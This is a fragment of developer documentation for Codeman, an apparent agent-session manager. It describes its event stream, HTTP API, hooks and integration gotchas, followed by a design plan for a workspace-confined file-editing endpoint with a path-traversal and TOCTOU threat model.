||||
|
||||
## Seam 2: SSE events
|
||||
|
||||
`GET /api/v1/events` is a Server-Sent Events stream. Each message is
|
||||
`event: <name>` plus `data: <json>`. There are 149 event names following a
|
||||
`domain:action` convention, registered in `src/web/sse-events.ts`.
|
||||
|
||||
The ones most integrations want:
|
||||
|
||||
| Event | Meaning |
|
||||
| --- | --- |
|
||||
| `session:created`, `session:deleted` | A session appeared or went away |
|
||||
| `session:idle` | The agent stopped working |
|
||||
| `session:completion` | A completion message was detected |
|
||||
| `session:exit`, `session:error` | The session ended or failed |
|
||||
| `hook:permission_prompt` | The agent is asking for permission |
|
||||
| `hook:idle_prompt`, `hook:stop` | The agent is waiting on you, or stopped |
|
||||
| `hook:task_completed`, `task:completed` | Work finished |
|
||||
| `subagent:discovered`, `subagent:completed` | Background agent lifecycle |
|
||||
| `mux:died` | A multiplexer session died unexpectedly |
|
||||
| `cron:runCreated`, `cron:runUpdated` | Scheduled job activity |
|
||||
|
||||
### Filtering
|
||||
|
||||
`?sessions=id1,id2` suppresses only the high-volume `session:terminal` stream for
|
||||
sessions you did not list. Lifecycle and metadata events are always delivered, so
|
||||
you cannot accidentally filter away the thing you are listening for.
|
||||
|
||||
Pass `?clientId=<uuid>` to enable live filter updates through
|
||||
`POST /api/v1/events/subscribe` without reconnecting the stream.
|
||||
|
||||
### Example: notify when any agent needs you
|
||||
|
||||
```js
|
||||
const res = await fetch('http://127.0.0.1:3000/api/v1/events', {
|
||||
headers: { Authorization: 'Basic ' + btoa(`admin:${process.env.CODEMAN_PASSWORD}`) },
|
||||
});
|
||||
const reader = res.body.getReader();
|
||||
const decoder = new TextDecoder();
|
||||
let buf = '';
|
||||
const WANTED = new Set(['hook:permission_prompt', 'hook:idle_prompt', 'session:idle']);
|
||||
|
||||
for (;;) {
|
||||
const { value, done } = await reader.read();
|
||||
if (done) break;
|
||||
buf += decoder.decode(value, { stream: true });
|
||||
const frames = buf.split('\n\n');
|
||||
buf = frames.pop() ?? '';
|
||||
for (const frame of frames) {
|
||||
const name = frame.match(/^event: (.+)$/m)?.[1];
|
||||
const data = frame.match(/^data: (.+)$/m)?.[1];
|
||||
if (name && WANTED.has(name)) notify(name, JSON.parse(data ?? '{}'));
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Seam 3: HTTP API and CLI
|
||||
|
||||
Around 200 handlers across 21 route files cover sessions, cases, files, cron,
|
||||
respawn, Ralph, the orchestrator, search, and admin. Each route module carries an
|
||||
`@fileoverview` describing its endpoints.
|
||||
|
||||
If the caller is an agent running _inside_ a Codeman session, install the packaged
|
||||
agent skill instead of teaching it these calls by hand: `skills/codeman` in the repo
|
||||
(`npx skills add Ark0N/Codeman --skill codeman -g`, or `codeman skill install
|
||||
[--case <name>]`, or the synced `agentSkillEnabled` App Setting for automatic
|
||||
per-case injection on Claude session create). The skill carries the guard, the
|
||||
safety rules, and verified wait/orchestration recipes.
|
||||
|
||||
The common ones:
|
||||
|
||||
```bash
|
||||
# List sessions (live + persisted + transcript history, deduped)
|
||||
curl -u admin:$PASS http://127.0.0.1:3000/api/v1/sessions/unified
|
||||
|
||||
# Create a session
|
||||
curl -u admin:$PASS -X POST http://127.0.0.1:3000/api/v1/sessions \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"workingDir":"/home/me/project","mode":"claude"}'
|
||||
|
||||
# Send a prompt (single-line only, and it must end with \r: Enter is sent only
|
||||
# when the input contains a carriage return; without it the text sits on the
|
||||
# session's prompt unsubmitted)
|
||||
curl -u admin:$PASS -X POST http://127.0.0.1:3000/api/v1/sessions/$ID/input \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"input":"run the tests\r","useMux":true}'
|
||||
```
|
||||
|
||||
`POST .../input` also accepts `clientId` (stable per client, max 128 chars) and
|
||||
`seq` (monotonic per session). Send both and the server applies each pair
|
||||
at-most-once, so retrying after a dropped connection cannot type the prompt
|
||||
twice. Omit them entirely rather than sending `null`.
|
||||
|
||||
It also accepts `wait` and `waitTimeout`, which hold the response open until the
|
||||
session finishes the turn you just started. `wait` is `true` (the default signal
|
||||
set) or a comma list of `idle,working,stop,blocked,exit`; the result comes back
|
||||
under `data.wait`. Sending them changes nothing for callers that do not: without
|
||||
`wait` the response is still `{"success": true, "data": {}}` and the write is still
|
||||
fire-and-forget. The two interact with `clientId` / `seq` in one way worth knowing:
|
||||
a **tagged duplicate** (a pair the server already applied) skips the write but still
|
||||
waits, answering from the session's current state rather than blocking for a
|
||||
transition that already happened. It reports `"delivered": false, "duplicate": true`.
|
||||
|
||||
### Waiting instead of polling
|
||||
|
||||
Three calls block until something happens: `GET /api/v1/sessions/:id/wait` (a
|
||||
lifecycle signal), `GET /api/v1/sessions/:id/wait-output` (a literal string in the
|
||||
output), and the `wait` field above. Full parameter and response tables are in
|
||||
[`api-reference.md`](api-reference.md#long-polling-agent-wait). Four things decide
|
||||
whether your integration works, and the last one is what actually bites:
|
||||
|
||||
- **A timeout is a `200` with `wait.timedOut: true`**, not an error. Loop over short
|
||||
waits rather than issuing one long one, because `tailscale serve` and cloudflared
|
||||
both cut idle connections and a single 10-minute call is the pattern most likely
|
||||
to die in the field.
|
||||
- **`wait.timeoutMs`** is the timeout after server-side clamping (600 s ceiling by
|
||||
default). Read it rather than assuming you got what you asked for.
|
||||
- **`stop` and `blocked` only exist for `claude` sessions**, and on a `shell` session
|
||||
even `idle` fires only once at startup, so send-and-wait there can only time out.
|
||||
See the Gotchas below.
|
||||
|
||||
⚠️ **There is no readiness signal, and skipping readiness is the failure that looks
|
||||
like success.** A session reports `idle` before its CLI has spawned, and a `claude`
|
||||
worker in a brand-new case comes up on the CLI's **trust dialog**, which has a ❯
|
||||
prompt of its own. Prompt it at that moment and the text lands in the dialog, the
|
||||
`\r` does not get past it, and the session's startup `idle` lands inside the wait
|
||||
window: the wait resolves on `idle` in a couple of seconds with `timedOut: false`,
|
||||
indistinguishable from a finished turn. Wait for the pid, then wait for the
|
||||
composer, answering the dialog only as the bounded fallback.
|
||||
|
||||
A worked orchestration: start a worker, get it ready, prompt it, wait, clean up.
|
||||
|
||||
```bash
|
||||
API="${CODEMAN_API_URL:-http://127.0.0.1:3000}" # auto-set in-session, correct scheme included
|
||||
AUTH=(-u "admin:$CODEMAN_PASSWORD") # omit entirely if no password is set
|
||||
CURL=(curl -sk "${AUTH[@]}") # -k: harmless on http, required on --https installs (self-signed cert)
|
||||
|
||||
# 1. Start a worker session (creates the case if it does not exist yet).
|
||||
# The guard matters: a TLS or auth failure otherwise leaves SID empty and every
|
||||
# later step "succeeds" against nothing.
|
||||
SID=$("${CURL[@]}" -X POST "$API/api/v1/quick-start" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"caseName":"worker-1","mode":"claude"}' | jq -r '.data.sessionId')
|
||||
[ -n "$SID" ] && [ "$SID" != null ] || { echo "quick-start failed"; exit 1; }
|
||||
|
||||
# 2. READINESS: composer marker first, trust dialog only as the bounded fallback.
|
||||
# Skip this and step 3 reports a turn that never ran. Do NOT probe trust first
|
||||
# and Enter blindly: the dialog text stays in the buffer for the life of the
|
||||
# session, so on every later run that probe matches stale text and the Enter
|
||||
# lands in a ready composer. Match single tokens only: TUI text can arrive
|
||||
# without its spaces. Stage 1 is short on purpose (an already-trusted case
|
||||
# matches in <1 s; a first-run case can never pass it and pays it in full).
|
||||
until [ "$("${CURL[@]}" "$API/api/v1/sessions/$SID" | jq '.data.pid')" != null ]
|
||||
do sleep 1; done
|
||||
R=$("${CURL[@]}" -G "$API/api/v1/sessions/$SID/wait-output" \
|
||||
--data-urlencode 'match=bypass' --data-urlencode 'from=buffer' \
|
||||
--data-urlencode 'timeout=5000') # composer's status bar = ready
|
||||
if ! jq -e '.data.wait.matched' <<<"$R" >/dev/null; then
|
||||
T=$("${CURL[@]}" -G "$API/api/v1/sessions/$SID/wait-output" \
|
||||
--data-urlencode 'match=trust' --data-urlencode 'from=buffer' \
|
||||
--data-urlencode 'timeout=2000')
|
||||
jq -e '.data.wait.matched' <<<"$T" >/dev/null && \
|
||||
"${CURL[@]}" -X POST "$API/api/v1/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' -d '{"input":"\r","useMux":true}' >/dev/null
|
||||
"${CURL[@]}" -G "$API/api/v1/sessions/$SID/wait-output" \
|
||||
--data-urlencode 'match=bypass' --data-urlencode 'from=buffer' \
|
||||
--data-urlencode 'timeout=45000' >/dev/null
|
||||
fi
|
||||
|
||||
# 3. Send the prompt AND register the wait in one call, so the answer cannot be
|
||||
# the previous turn's idle state. Single line only, ending in \r (otherwise
|
||||
# Enter is never sent and this wait times out on a turn that never started).
|
||||
W=$("${CURL[@]}" -X POST "$API/api/v1/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"input":"Run the test suite and summarize the failures\r","useMux":true,
|
||||
"clientId":"orchestrator","seq":1,"wait":"stop,exit","waitTimeout":60000}' \
|
||||
| jq -c '.data.wait')
|
||||
|
||||
# 4. That first wait probably timed out (60 s). Keep going in SHORT waits.
|
||||
for _ in $(seq 1 30); do
|
||||
[ "$(jq -r '.timedOut' <<<"$W")" = 'true' ] || break # signal fired, or wait ended
|
||||
W=$("${CURL[@]}" \
|
||||
"$API/api/v1/sessions/$SID/wait?until=stop,exit&timeout=60000" | jq -c '.data.wait')
|
||||
done
|
||||
jq -r 'if .ended or .aborted then "worker is not running"
|
||||
elif .timedOut then "still working after 30 waits"
|
||||
else "signal: \(.signal)" end' <<<"$W"
|
||||
|
||||
# 5. Read what it produced, then delete the session YOU created, by exact id.
|
||||
# ⚠️ NOT /output: its textOutput is empty for every tmux-backed session.
|
||||
# `tail` counts BYTES, and the payload is terminal data with ANSI in it.
|
||||
"${CURL[@]}" "$API/api/v1/sessions/$SID/terminal?tail=8000" | jq -r '.data.terminalBuffer'
|
||||
"${CURL[@]}" -X DELETE "$API/api/v1/sessions/$SID"
|
||||
```
|
||||
|
||||
Waiting on a marker instead of a signal is the form that works in **every** mode,
|
||||
and the only one that works on a `shell` session:
|
||||
|
||||
```bash
|
||||
# ⚠️ Split the marker so the typed line never contains it: your own keystrokes echo
|
||||
# into the output stream, so an unsplit marker matches before the command has run.
|
||||
# `from=buffer` also catches a marker that printed before the wait registered.
|
||||
N=$RANDOM
|
||||
"${CURL[@]}" -X POST "$API/api/v1/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d "{\"input\":\"M=DONE; npm test; echo \${M}_$N rc=\$?\r\",\"useMux\":true}"
|
||||
"${CURL[@]}" -G "$API/api/v1/sessions/$SID/wait-output" \
|
||||
--data-urlencode "match=DONE_$N" --data-urlencode 'from=buffer' \
|
||||
--data-urlencode 'timeout=60000' | jq '.data.wait'
|
||||
```
|
||||
|
||||
For shell scripting, the `codeman` CLI is the same surface without the HTTP
|
||||
plumbing:
|
||||
|
||||
```
|
||||
codeman session start|stop|list|logs codeman task add|list|status|remove|clear
|
||||
codeman ralph start|stop|status|reset codeman users add|passwd|list
|
||||
codeman status | list | attach <path> codeman doctor
|
||||
```
|
||||
|
||||
## Seam 4: Hooks
|
||||
|
||||
Claude Code hooks post to `POST /api/v1/hook-event` from inside an agent session.
|
||||
Codeman installs its own hooks automatically, but the endpoint is open to yours.
|
||||
|
||||
```json
|
||||
{ "event": "task_completed", "sessionId": "abc123", "data": { "any": "json" } }
|
||||
```
|
||||
|
||||
`event` must be one of `permission_prompt`, `elicitation_dialog`, `idle_prompt`,
|
||||
`stop`, `teammate_idle`, `task_completed`. Each becomes the matching `hook:*` SSE
|
||||
event.
|
||||
|
||||
⚠️ This endpoint skips Basic auth so hooks keep working, but when auth is active
|
||||
the loopback bypass requires the `X-Codeman-Hook-Secret` header
|
||||
(`~/.codeman/hook-secret`) unconditionally.
|
||||
|
||||
## Gotchas
|
||||
|
||||
Every one of these has cost somebody real time.
|
||||
|
||||
- **CORS is localhost-only.** `Access-Control-Allow-Origin` is echoed only for
|
||||
`localhost`, `127.0.0.1`, and `::1`. A browser app on any other origin cannot
|
||||
call the API. Integrate server-side.
|
||||
- **A missing `Origin` header is allowed**, which is why curl, CLIs, and hooks
|
||||
work. Cross-site origins are blocked by the CSRF guard.
|
||||
- **Reverse-proxy domains are rejected** by the anti-DNS-rebinding Host allowlist
|
||||
unless added via `CODEMAN_ALLOWED_HOSTS=host,.suffix`.
|
||||
- **`null` is not `undefined`.** Request schemas use Zod `.optional()`, which
|
||||
accepts `undefined` only. `JSON.stringify({ field: null })` keeps the null on
|
||||
the wire and fails with `INVALID_INPUT`. Omit the key instead. This has caused
|
||||
shipped bugs more than once.
|
||||
- **`text/plain` bodies stay raw.** Auto-parsing them as JSON enabled
|
||||
simple-request CSRF, so it is deliberate. Send `application/json`.
|
||||
- **Prompts are single-line and must end with `\r`.** The server splits your text
|
||||
and Enter into two separate tmux writes (Ink needs them apart), but it sends the
|
||||
Enter **only when the input contains a carriage return**. Without it your text
|
||||
sits on the prompt unsubmitted, which is the single most common "the wait
|
||||
endpoints don't work" report: the wait runs its full timeout on a turn that never
|
||||
started. Newlines inside the string are stripped rather than rejected, so
|
||||
`"echo A\necho B\r"` runs the single joined command `echo Aecho B`: send one line
|
||||
per call.
|
||||
- **`wait-output`'s `from=now` is not "printed after you asked".** tmux repaints
|
||||
the visible screen on attach, on resize, and on any TUI redraw, and a repaint
|
||||
arrives as ordinary output, so text already on screen can satisfy a fresh wait.
|
||||
Observed live: a marker echoed a minute earlier matched instantly. Use a marker
|
||||
unique to each call, and build it so the typed line never contains it (your own
|
||||
keystrokes echo into the stream). Matching is a literal substring, so `regex=` is
|
||||
rejected with a `400` rather than ignored.
|
||||
- **`wait-output` matches the normalized PTY stream, not the screen.** ANSI escape
|
||||
sequences are stripped (the `ESC ( B` charset escape a bash prompt emits on every
|
||||
line included), a partial escape at a chunk boundary is held back until its tail
|
||||
arrives, and a match may straddle PTY chunks, so text you printed yourself
|
||||
matches reliably (`printf STRAD; sleep 1; printf DLEQQ` is matchable as
|
||||
`STRADDLEQQ`). What can still fail is TUI output: a full-screen TUI positions
|
||||
words with cursor moves, so its text can reach the matcher **without spaces** and
|
||||
a multi-word match is unreliable there. Match one short space-free token, ideally
|
||||
one you printed yourself, and keep it out of the typed line (your own keystrokes
|
||||
echo into the stream).
|
||||
- **`stop` and `blocked` never fire for `shell`, `opencode`, `codex`, `gemini` or
|
||||
`antigravity` sessions.** They come from Claude Code hooks, which no other mode
|
||||
installs, so only `idle`, `working` and `exit` exist there. Asking for them
|
||||
explicitly is a `400`; omitting `until` is safe, since the server drops them from
|
||||
the default set and echoes what it actually waited on as `wait.until`. Even in
|
||||
`claude` mode, a Docker case needs `CODEMAN_DOCKER_BRIDGE_HOOKS=1` for hooks to
|
||||
reach the server at all, a remote-SSH case's hooks may never arrive, and a case
|
||||
written by Codeman < 1.13.0 against an `--https` install carries hook curls
|
||||
without `-k` that TLS-fail silently — a 1.13.0+ server rewrites them the next
|
||||
time a session starts in that case.
|
||||
- **Unwrap the envelope** before reading fields. `data` is not the response body.
|
||||
|
||||
## Publishing your integration
|
||||
|
||||
There is no registry and no review queue. Add the GitHub topic
|
||||
**`codeman-integration`** to your public repository so others can find it, and
|
||||
link back to Codeman in your README.
|
||||
|
||||
If a real ecosystem of these appears, a manifest format and an install command
|
||||
become worth building. Until then, these four seams are the contract, and they
|
||||
require nothing of you but HTTP.
|
||||
|
||||
## What Codeman deliberately does not have
|
||||
|
||||
- **No in-process plugin runtime.** See the reasoning at the top of this page.
|
||||
- **No build or startup hooks** for third-party code. Run your own process.
|
||||
- **No per-plugin config or state directories.** Manage your own files.
|
||||
- **No sandbox for integration code**, because Codeman never launches it. Your
|
||||
integration is your own process, started by you, with your permissions,
|
||||
talking HTTP.
|
||||
|
||||
That last point is about integration code specifically, not about Codeman.
|
||||
Sandboxing lives on a different axis here: the thing worth isolating is the
|
||||
**agent**, and you isolate it per case with
|
||||
[Docker cases](docker-cases.md), which run the agent in a hardened container with
|
||||
a bind-mounted workspace and seeded (not shared) credentials. An integration that
|
||||
creates or drives a Docker-backed session inherits that isolation for free, since
|
||||
it is a property of the session rather than of the caller.
|
||||
@@ -0,0 +1,432 @@
|
||||
# File Viewer edit mode (issue #212)
|
||||
|
||||
Plan only. No implementation yet.
|
||||
|
||||
Goal: close the loop "agent writes a file, you review it in the viewer, tweak two lines, save, tell the
|
||||
agent to continue" without hopping into the terminal, with the phone as the primary target.
|
||||
|
||||
Scope from the issue: an Edit toggle on text previews, a write endpoint that inherits the read path's
|
||||
confinement, text-only, edit-in-place (no create, no delete, no rename), no editing through the
|
||||
Docker/remote overlays.
|
||||
|
||||
---
|
||||
|
||||
## 1. What exists today
|
||||
|
||||
**Read path (backend), all in `src/web/routes/file-routes.ts`:**
|
||||
|
||||
| Route | Line | Notes |
|
||||
| ------------------------------------ | ------ | ------------------------------------------------------------------ |
|
||||
| `GET /api/sessions/:id/files` | `741` | Tree scan of `session.workingDir`, hidden files off by default |
|
||||
| `GET /api/sessions/:id/file-content` | `865` | The text/preview classifier. `findSessionOrFail` + `validateSessionFilePath` |
|
||||
| `GET /api/sessions/:id/file-raw` | `1018` | Bytes, 50MB cap |
|
||||
| `GET /api/sessions/:id/file-preview` | `1254` | DOCX/PPTX to PDF, everything else redirects to `file-raw` |
|
||||
| `GET /api/download` | `1384` | The only read route that also runs `isSensitivePath()` |
|
||||
|
||||
`file-content` classification order (`file-routes.ts:881-1011`): extension buckets (image / video / audio /
|
||||
known-binary) return metadata only; otherwise the bytes are read, sniffed for a NUL in the first 8KB, and
|
||||
either reported as `type:'binary'` or decoded as UTF-8 and **truncated to `lines` (default 500, hard cap
|
||||
10000)**. Caps: `MAX_TEXT_FILE_SIZE` 10MB.
|
||||
|
||||
Confinement is `validateSessionFilePath()` (`src/web/route-helpers.ts:67`): `resolve()` then `realpathSync()`
|
||||
then reject if the result is not under `workingDir`. Because it realpaths the *full* path, a symlink whose
|
||||
target escapes the workspace is already rejected. Ownership is `findSessionOrFail()` which runs
|
||||
`canAccessOwned()` (`route-helpers.ts:102`), a no-op outside multi-user mode.
|
||||
|
||||
**Read path (frontend), `src/web/public/panels-ui.js`:**
|
||||
|
||||
- `loadFileBrowser()` `2947`, `renderFileBrowserTree()` `2978`, click to `openFilePreview()` `3056`.
|
||||
- `openFilePreview(filePath, sessionId, attachmentId)` `3193`: attachment-id branch, then docx/pptx, pdf,
|
||||
svg branches, then the generic `file-content` fetch at `3274` with **`&lines=500` hardcoded**, rendering
|
||||
text as `<pre><code>${escapeHtml(...)}</code></pre>` at `3298` and stashing `this.filePreviewContent`.
|
||||
- `closeFilePreview()` `3308`, `copyFilePreviewContent()` `3751`.
|
||||
- Markup: `src/web/public/index.html:420-432` (`filePreviewOverlay` / `-Title` / `-Body` / `-Footer`, two
|
||||
header buttons: copy and close).
|
||||
- CSS: `src/web/public/styles.css:9320-9430`. Overlay `z-index: 2000`, window `80vw/80vh`, capped
|
||||
`900x700`. There are **no `.file-preview-*` rules in `mobile.css` at all**.
|
||||
|
||||
**Reachability on phones.** The header File Viewer button is hidden below 430px
|
||||
(`mobile.css:482`, locked by `KNOWN_PHONE_HIDDEN` in `test/mobile-header-buttons-policy.test.ts`), so on a
|
||||
phone the preview overlay is reached through:
|
||||
|
||||
1. an attachment card's **Preview** button (`panels-ui.js:3451`), which is exactly the "agent just wrote a
|
||||
file" path the issue describes,
|
||||
2. the attachment-history drawer (`panels-ui.js:3709`),
|
||||
3. App Settings to Panels to **File Browser** (`showFileBrowser`, applied in `settings-ui.js:2202`; the
|
||||
panel is mobile-styled at `mobile.css:1868`).
|
||||
|
||||
So edit mode is reachable on a phone today via (1) and (2) without touching the header policy. Improving
|
||||
the entry point is listed as an open decision in section 10, not assumed.
|
||||
|
||||
---
|
||||
|
||||
## 2. Threat model, stated honestly
|
||||
|
||||
Anyone who can call this API can already reach `POST /api/sessions/:id/input` and type an arbitrary prompt
|
||||
into an agent running with `--dangerously-skip-permissions`. A workspace-confined write endpoint therefore
|
||||
does not create a new privilege tier for an authenticated caller.
|
||||
|
||||
What it *would* create if built carelessly is a **new host-write primitive reachable by path**, so the
|
||||
things this plan actually defends against are:
|
||||
|
||||
1. **Path traversal / symlink escape** writing outside the workspace.
|
||||
2. **TOCTOU**: a path component that becomes a symlink between validation and write.
|
||||
3. **Cross-user writes** in multi-user mode (`canAccessOwned`).
|
||||
4. **Silent data loss**, which is the highest-probability real-world failure here and gets its own section.
|
||||
|
||||
CSRF is already covered: `registerHostGuard()` (`src/web/middleware/auth.ts:555-578`) rejects any
|
||||
non-safe-method request whose `Origin` is cross-site. The webview-capability exemption at that gate is
|
||||
fenced to `GET`/`HEAD` for the Referer form (`auth.ts:161`) and to `/webview/:cap/*` paths for the path
|
||||
form, so a proxied dashboard cannot reach a new `PUT /api/...`. Using `PUT` + `application/json` also
|
||||
forces a preflight for any cross-origin attempt.
|
||||
|
||||
---
|
||||
|
||||
## 3. Backend design
|
||||
|
||||
### 3.1 New policy module: `src/config/file-editing.ts`
|
||||
|
||||
Pure, unit-testable, no IO (config lives in `src/config/`, no barrel, import the file directly).
|
||||
|
||||
```ts
|
||||
export const MAX_EDITABLE_BYTES = 512 * 1024; // content cap, both directions
|
||||
export const EDITABLE_EXTENSIONS: ReadonlySet<string>; // ts,tsx,js,jsx,mjs,cjs,json,jsonc,md,mdx,txt,
|
||||
// css,scss,less,html,htm,xml,svg?,yml,yaml,toml,
|
||||
// ini,cfg,conf,env?,sh,bash,zsh,fish,py,rb,go,rs,
|
||||
// java,kt,swift,c,h,cpp,hpp,cs,php,sql,graphql,
|
||||
// proto,lua,pl,r,jl,tf,gradle,csv,tsv,log,diff,patch
|
||||
export const EDITABLE_BASENAMES: ReadonlySet<string>; // Dockerfile, Makefile, LICENSE, .gitignore,
|
||||
// .prettierignore, .editorconfig, .nvmrc, ...
|
||||
export function isEditableFileName(fileName: string): boolean;
|
||||
export function isDeniedEditRelativePath(rel: string): boolean; // `.git/` subtree
|
||||
export function detectEol(text: string): 'lf' | 'crlf';
|
||||
export function applyEol(text: string, eol: 'lf' | 'crlf'): string;
|
||||
```
|
||||
|
||||
Decisions baked in:
|
||||
|
||||
- **Allowlist, not blocklist**, per the issue and per the existing attachment-guard precedent.
|
||||
- `svg` and `env` are deliberately marked with `?` above: `svg` is served as an untrusted octet-stream on
|
||||
the read side (`file-routes.ts:118`) so allowing an edit is defensible, but I recommend **excluding
|
||||
both** in v1. `.env` files are matched by `isSensitivePath()` anyway and would be rejected downstream;
|
||||
excluding them at the allowlist keeps a single obvious refusal.
|
||||
- `isDeniedEditRelativePath` blocks the `.git/` subtree: `.git/hooks/*` is code execution and a corrupt
|
||||
index is unrecoverable-looking to a user who only wanted to fix a typo. Other dotfiles stay allowed but
|
||||
are not reachable from the tree UI anyway (`showHidden=false`).
|
||||
|
||||
### 3.2 Read-for-edit: extend the existing GET
|
||||
|
||||
`GET /api/sessions/:id/file-content?path=<rel>&edit=1`
|
||||
|
||||
When `edit=1`:
|
||||
|
||||
- skip line truncation entirely (a truncated buffer must never become an edit buffer, see section 4.1),
|
||||
- enforce `MAX_EDITABLE_BYTES` instead of `MAX_TEXT_FILE_SIZE` and answer 413 over it (as a structured
|
||||
throw with `statusCode: 413`, the `throwFilesystemPickerError` pattern, since the central errorCode-to-
|
||||
status map has no 413 entry; see the error-mechanics note in 3.3),
|
||||
- run the editability gate (`isEditableFileName`, `isDeniedEditRelativePath`, `isSensitivePath`,
|
||||
`isBlockedAttachmentPath`) and the content gate (NUL sniff plus UTF-8 round-trip, see 4.3),
|
||||
- return `{ content, size, mtimeMs, totalLines, truncated: false, extension, editable: true, hash, eol }`.
|
||||
`hash` is `sha256` hex of the exact on-disk bytes.
|
||||
|
||||
Non-`edit` responses gain **only** `editable: boolean` (additive, no shape change for existing consumers),
|
||||
which is all the UI needs to decide whether to show the Edit button. No `hash` on plain reads: the Edit
|
||||
action re-fetches with `edit=1` anyway (section 4.1), which is where the hash comes from, and hashing every
|
||||
casual 10MB preview would be pure waste.
|
||||
|
||||
### 3.3 Write: `PUT /api/sessions/:id/file-content`
|
||||
|
||||
Body (new `FileWriteSchema` in `src/web/schemas.ts`, Zod v4):
|
||||
|
||||
```ts
|
||||
{ path: string, content: string, baseHash: string, eol?: 'lf'|'crlf', force?: boolean }
|
||||
```
|
||||
|
||||
Registered with an explicit route option `{ bodyLimit: 4 * 1024 * 1024 }`. **Fastify's default `bodyLimit`
|
||||
is 1MB and this repo configures none**, and JSON escaping expands content: 2x for a file full of quotes or
|
||||
backslashes, up to 6x for control characters (each serialized as a `\uXXXX` escape), so 512KB of content
|
||||
can legitimately exceed 1MB on the wire; blowing the limit produces a raw `FST_ERR_CTP_BODY_TOO_LARGE`, not an `ApiResponse` envelope. Two
|
||||
related sizing notes: `z.string().max()` counts **UTF-16 code units, not bytes**, so the schema's `.max()`
|
||||
is only a coarse pre-filter and the real cap is an explicit `Buffer.byteLength(content, 'utf8')` check in
|
||||
the handler (step 7a below); and 4MB comfortably bounds the worst-case expansion of a 512KB file without
|
||||
inviting multi-MB bodies elsewhere.
|
||||
|
||||
**Error mechanics** (matters for both prod behavior and testability): a handler that *returns* a
|
||||
`{success:false, errorCode}` envelope gets its HTTP status assigned centrally by the preSerialization hook
|
||||
in `server.ts` (`httpStatusForErrorCode()`, `src/types/api.ts`), but the route-test harness
|
||||
(`test/routes/_route-test-utils.ts`) installs only `installRouteErrorHandler`, **not** that hook, so
|
||||
returned envelopes surface as HTTP 200 in tests. The PUT handler should therefore use the same
|
||||
structured-**throw** pattern as the filesystem picker (`throwFilesystemPickerError`, `file-routes.ts:411`):
|
||||
thrown `{statusCode, body}` errors are rendered identically in prod and in the harness, and they allow the
|
||||
one status the code map cannot express (413). The error envelope itself is strictly
|
||||
`{success:false, error, errorCode}`, **it has no data arm**, so no error response may carry extra payload.
|
||||
|
||||
Handler order (each step is a test case):
|
||||
|
||||
1. `findSessionOrFail(ctx, id, req)` (live sessions only, matching the read route, and it carries the
|
||||
multi-user ownership check).
|
||||
2. `parseBody(FileWriteSchema, req.body)`, then `Buffer.byteLength(content, 'utf8') <= MAX_EDITABLE_BYTES`
|
||||
or 413 (the schema `.max()` alone cannot enforce a byte cap, see the sizing note above).
|
||||
3. `validateSessionFilePath(session.workingDir, path)` or 404 (do not distinguish "outside workspace" from
|
||||
"missing", matching the read route).
|
||||
4. `isSensitivePath(resolvedPath) || isBlockedAttachmentPath(resolvedPath, guard.blockedTrees)` or 403.
|
||||
5. `isDeniedEditRelativePath(relativePath)` or 403.
|
||||
6. `isEditableFileName(basename(resolvedPath))` or 400.
|
||||
7. `stat`: must be `isFile()`, size within `MAX_EDITABLE_BYTES`, else 400/413. **No `O_CREAT` anywhere in
|
||||
this handler**, which is what enforces edit-in-place.
|
||||
8. Read current bytes, compute `hash`, run the NUL sniff and the UTF-8 round-trip check, else 400.
|
||||
9. `hash !== baseHash && !force` gives **409 CONFLICT** (`ApiErrorCode.CONFLICT`, plain envelope; the error
|
||||
arm carries no data, see the error-mechanics note). The client's conflict dialog gets fresh state by
|
||||
re-fetching `edit=1`, which it needs for its Reload action anyway.
|
||||
10. Build the output buffer: `applyEol(content, eol ?? detected-from-original)`; re-check
|
||||
`Buffer.byteLength` against the cap.
|
||||
11. Write atomically in the resolved parent directory:
|
||||
`fs.open(<dir>/.<name>.codeman-tmp-<rand>, 'wx', stat.mode & 0o777)`, then `fchmod(stat.mode & 0o777)`
|
||||
(open's mode argument is masked by the process umask, so the chmod is what actually preserves an
|
||||
unusual mode), write, `fsync`, close, `fs.rename(tmp, resolvedPath)`, unlink the temp on any failure.
|
||||
12. Re-stat, return `{ success: true, data: { path, size, mtimeMs, hash, totalLines } }`.
|
||||
|
||||
Why `O_EXCL` temp plus rename rather than truncate-in-place:
|
||||
|
||||
- `wx` cannot follow a pre-existing symlink, which closes the TOCTOU window from step 3 to step 11 without
|
||||
needing `O_NOFOLLOW` gymnastics.
|
||||
- `rename()` does not follow a symlink in the final component, so even if `resolvedPath` were swapped for a
|
||||
symlink after validation, the symlink itself is replaced and the swap target is untouched.
|
||||
- A crash mid-write leaves the original intact.
|
||||
|
||||
Caveat to document in the code comment: rename replaces the inode, so hardlinks to the file keep the old
|
||||
content. That is the same trade-off vim makes by default and is preferable to a truncate window here.
|
||||
|
||||
No SSE event in v1. Nothing else in the app needs to know: `image-watcher.ts` only reacts to
|
||||
`.png/.jpg/.jpeg/.gif/.webp/.bmp/.svg/.pdf/.docx/.pptx` adds (`image-watcher.ts:23-25`), none of which are
|
||||
editable text, and the temp filename does not match either.
|
||||
|
||||
---
|
||||
|
||||
## 4. The five traps
|
||||
|
||||
These are the parts that turn a "small write endpoint" into a bug report.
|
||||
|
||||
### 4.1 Truncation (the data-loss trap)
|
||||
|
||||
The frontend fetches `&lines=500` (`panels-ui.js:3274`). Saving that buffer back would **delete every line
|
||||
past 500**. Worse, the content hash of the full file would still match, so an optimistic-concurrency check
|
||||
cannot catch it.
|
||||
|
||||
Mitigations, all three:
|
||||
|
||||
- The Edit affordance is only offered when the loaded payload came from `edit=1` (which never truncates).
|
||||
Tapping Edit on an already-rendered preview **re-fetches** with `edit=1` before swapping in the editor.
|
||||
- The read-for-edit path 413s above `MAX_EDITABLE_BYTES` rather than truncating, so "too big to edit here"
|
||||
is an explicit refusal with a message, never a silent partial buffer.
|
||||
- A test asserts `edit=1` never returns `truncated: true`.
|
||||
|
||||
### 4.2 Line endings
|
||||
|
||||
A `<textarea>`'s `.value` normalizes to LF. Saving a CRLF file naively rewrites every line, producing a
|
||||
whole-file diff for a two-line change. So: the read returns the detected `eol`, the client echoes it back
|
||||
